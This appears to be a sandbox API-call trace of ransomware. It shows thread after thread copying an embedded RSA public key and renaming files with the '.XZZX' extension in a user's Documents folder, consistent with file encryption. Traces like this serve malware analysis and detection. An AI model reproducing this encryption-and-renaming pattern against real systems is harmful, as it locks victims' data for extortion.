lstrcpyW (in: lpString1=0x2aaf460, lpString2="EE9B10B00F697CE4836159F013D6612C.XZZX" | out: lpString1="EE9B10B00F697CE4836159F013D6612C.XZZX") returned="EE9B10B00F697CE4836159F013D6612C.XZZX" [0176.443] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0176.443] SetErrorMode (uMode=0x1) returned 0x1 [0176.443] lstrcpyW (in: lpString1=0x2aaf860, lpString2="EE9B10B00F697CE4836159F013D6612C.XZZX" | out: lpString1="EE9B10B00F697CE4836159F013D6612C.XZZX") returned="EE9B10B00F697CE4836159F013D6612C.XZZX" [0176.443] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xe5d0734, Data2=0x27c, Data3=0x448e, Data4=([0]=0xbb, [1]=0xde, [2]=0xe4, [3]=0x91, [4]=0x0, [5]=0x82, [6]=0x9f, [7]=0x9b))) returned 0x0 [0176.443] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\EE9B10B00F697CE4836159F013D6612C.XZZX") returned 102 [0176.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0176.443] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\AF1DE53000AA50C80E5D073403553510.XZZX") returned 102 [0176.443] StrStrW (lpFirst="EE9B10B00F697CE4836159F013D6612C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 623 os_tid = 0x424 [0176.602] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0176.602] lstrcpyW (in: lpString1=0x2aaf460, lpString2="069C108614226DDA8ED0A1A1188F5222.XZZX" | out: lpString1="069C108614226DDA8ED0A1A1188F5222.XZZX") returned="069C108614226DDA8ED0A1A1188F5222.XZZX" [0176.602] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0176.602] SetErrorMode (uMode=0x1) returned 0x1 [0176.602] lstrcpyW (in: lpString1=0x2aaf860, lpString2="069C108614226DDA8ED0A1A1188F5222.XZZX" | out: lpString1="069C108614226DDA8ED0A1A1188F5222.XZZX") returned="069C108614226DDA8ED0A1A1188F5222.XZZX" [0176.602] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xdd12f605, Data2=0x3627, Data3=0x4e05, Data4=([0]=0xa4, [1]=0xe0, [2]=0xb2, [3]=0x6a, [4]=0x9c, [5]=0x12, [6]=0xdb, [7]=0x7d))) returned 0x0 [0176.603] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\069C108614226DDA8ED0A1A1188F5222.XZZX") returned 118 [0176.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0176.603] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\ADC888C31080F0C3DD12F605132BD50B.XZZX") returned 118 [0176.603] StrStrW (lpFirst="069C108614226DDA8ED0A1A1188F5222.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 624 os_tid = 0x138 [0176.755] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0176.755] lstrcpyW (in: lpString1=0x2aaf460, lpString2="33820CBD02F4B0D349B807FF070C951B.XZZX" | out: lpString1="33820CBD02F4B0D349B807FF070C951B.XZZX") returned="33820CBD02F4B0D349B807FF070C951B.XZZX" [0176.755] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0176.755] SetErrorMode (uMode=0x1) returned 0x1 [0176.755] lstrcpyW (in: lpString1=0x2aaf860, lpString2="33820CBD02F4B0D349B807FF070C951B.XZZX" | out: lpString1="33820CBD02F4B0D349B807FF070C951B.XZZX") returned="33820CBD02F4B0D349B807FF070C951B.XZZX" [0176.755] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xaaf55f12, Data2=0xc3a3, Data3=0x4926, Data4=([0]=0xb9, [1]=0xe3, [2]=0xea, [3]=0x13, [4]=0xd4, [5]=0xaa, [6]=0x93, [7]=0x98))) returned 0x0 [0176.755] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\33820CBD02F4B0D349B807FF070C951B.XZZX") returned 118 [0176.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0176.755] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\C1A63E7637E68532AAF55F123A91697A.XZZX") returned 118 [0176.755] StrStrW (lpFirst="33820CBD02F4B0D349B807FF070C951B.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 625 os_tid = 0x584 [0176.910] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0176.910] lstrcpyW (in: lpString1=0x2aaf460, lpString2="3D2178A332ED6F4701E92E353705538F.XZZX" | out: lpString1="3D2178A332ED6F4701E92E353705538F.XZZX") returned="3D2178A332ED6F4701E92E353705538F.XZZX" [0176.911] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0176.911] SetErrorMode (uMode=0x1) returned 0x1 [0176.911] lstrcpyW (in: lpString1=0x2aaf860, lpString2="3D2178A332ED6F4701E92E353705538F.XZZX" | out: lpString1="3D2178A332ED6F4701E92E353705538F.XZZX") returned="3D2178A332ED6F4701E92E353705538F.XZZX" [0176.911] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x9945dfad, Data2=0x6ed4, Data3=0x4380, Data4=([0]=0x8a, [1]=0xdd, [2]=0xd4, [3]=0x7b, [4]=0x44, [5]=0x2d, [6]=0x53, [7]=0x75))) returned 0x0 [0176.911] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\3D2178A332ED6F4701E92E353705538F.XZZX") returned 118 [0176.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0176.911] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\F3F991441D38E6009945DFAD1FE3CA48.XZZX") returned 118 [0176.911] StrStrW (lpFirst="3D2178A332ED6F4701E92E353705538F.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 626 os_tid = 0x440 [0177.069] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0177.069] lstrcpyW (in: lpString1=0x2aaf460, lpString2="9345D86A0F87DA84ADA8003E13B4BECC.XZZX" | out: lpString1="9345D86A0F87DA84ADA8003E13B4BECC.XZZX") returned="9345D86A0F87DA84ADA8003E13B4BECC.XZZX" [0177.069] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0177.069] SetErrorMode (uMode=0x1) returned 0x1 [0177.070] lstrcpyW (in: lpString1=0x2aaf860, lpString2="9345D86A0F87DA84ADA8003E13B4BECC.XZZX" | out: lpString1="9345D86A0F87DA84ADA8003E13B4BECC.XZZX") returned="9345D86A0F87DA84ADA8003E13B4BECC.XZZX" [0177.070] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x6d2b884e, Data2=0xf6d4, Data3=0x4b00, Data4=([0]=0x9e, [1]=0xf6, [2]=0xef, [3]=0xc0, [4]=0x62, [5]=0x34, [6]=0x3, [7]=0xd3))) returned 0x0 [0177.070] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\9345D86A0F87DA84ADA8003E13B4BECC.XZZX") returned 118 [0177.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0177.070] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\3D07D49848501C006D2B884E4AFB0048.XZZX") returned 118 [0177.070] StrStrW (lpFirst="9345D86A0F87DA84ADA8003E13B4BECC.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 627 os_tid = 0x59c [0177.222] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0177.222] lstrcpyW (in: lpString1=0x2aaf460, lpString2="A216BEA01542C25C94FD01F0195AA6A4.XZZX" | out: lpString1="A216BEA01542C25C94FD01F0195AA6A4.XZZX") returned="A216BEA01542C25C94FD01F0195AA6A4.XZZX" [0177.222] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0177.222] SetErrorMode (uMode=0x1) returned 0x1 [0177.222] lstrcpyW (in: lpString1=0x2aaf860, lpString2="A216BEA01542C25C94FD01F0195AA6A4.XZZX" | out: lpString1="A216BEA01542C25C94FD01F0195AA6A4.XZZX") returned="A216BEA01542C25C94FD01F0195AA6A4.XZZX" [0177.222] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xe1aa73f4, Data2=0x46b, Data3=0x4556, Data4=([0]=0xbe, [1]=0xb9, [2]=0x16, [3]=0x6c, [4]=0x54, [5]=0x94, [6]=0xa8, [7]=0xce))) returned 0x0 [0177.222] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\A216BEA01542C25C94FD01F0195AA6A4.XZZX") returned 118 [0177.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0177.223] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\FC0E46FC013252F2E1AA73F403DD373A.XZZX") returned 118 [0177.223] StrStrW (lpFirst="A216BEA01542C25C94FD01F0195AA6A4.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 628 os_tid = 0x5d0 [0177.378] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0177.379] lstrcpyW (in: lpString1=0x2aaf460, lpString2="E47D77FB28AD6F18CEB95D752CDA5360.XZZX" | out: lpString1="E47D77FB28AD6F18CEB95D752CDA5360.XZZX") returned="E47D77FB28AD6F18CEB95D752CDA5360.XZZX" [0177.379] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0177.379] SetErrorMode (uMode=0x1) returned 0x1 [0177.379] lstrcpyW (in: lpString1=0x2aaf860, lpString2="E47D77FB28AD6F18CEB95D752CDA5360.XZZX" | out: lpString1="E47D77FB28AD6F18CEB95D752CDA5360.XZZX") returned="E47D77FB28AD6F18CEB95D752CDA5360.XZZX" [0177.379] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x73d6b735, Data2=0xe39, Data3=0x4e1f, Data4=([0]=0x86, [1]=0xfc, [2]=0xe7, [3]=0x36, [4]=0xd8, [5]=0x66, [6]=0xc7, [7]=0x10))) returned 0x0 [0177.379] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\E47D77FB28AD6F18CEB95D752CDA5360.XZZX") returned 118 [0177.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0177.379] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\88D3B0CD045716E773D6B7350701FB2F.XZZX") returned 118 [0177.379] StrStrW (lpFirst="E47D77FB28AD6F18CEB95D752CDA5360.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 629 os_tid = 0x528 [0177.534] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0177.534] lstrcpyW (in: lpString1=0x2aaf460, lpString2="E85C7261086E23DEDFC379D70C9B0826.XZZX" | out: lpString1="E85C7261086E23DEDFC379D70C9B0826.XZZX") returned="E85C7261086E23DEDFC379D70C9B0826.XZZX" [0177.535] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0177.535] SetErrorMode (uMode=0x1) returned 0x1 [0177.535] lstrcpyW (in: lpString1=0x2aaf860, lpString2="E85C7261086E23DEDFC379D70C9B0826.XZZX" | out: lpString1="E85C7261086E23DEDFC379D70C9B0826.XZZX") returned="E85C7261086E23DEDFC379D70C9B0826.XZZX" [0177.535] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xd5e31981, Data2=0x47e2, Data3=0x468a, Data4=([0]=0x81, [1]=0x56, [2]=0xa2, [3]=0x52, [4]=0xb0, [5]=0x79, [6]=0xbb, [7]=0xaf))) returned 0x0 [0177.535] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\E85C7261086E23DEDFC379D70C9B0826.XZZX") returned 118 [0177.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0177.535] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\CE8F4AE213CE8BD4D5E319811679701C.XZZX") returned 118 [0177.535] StrStrW (lpFirst="E85C7261086E23DEDFC379D70C9B0826.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 630 os_tid = 0x578 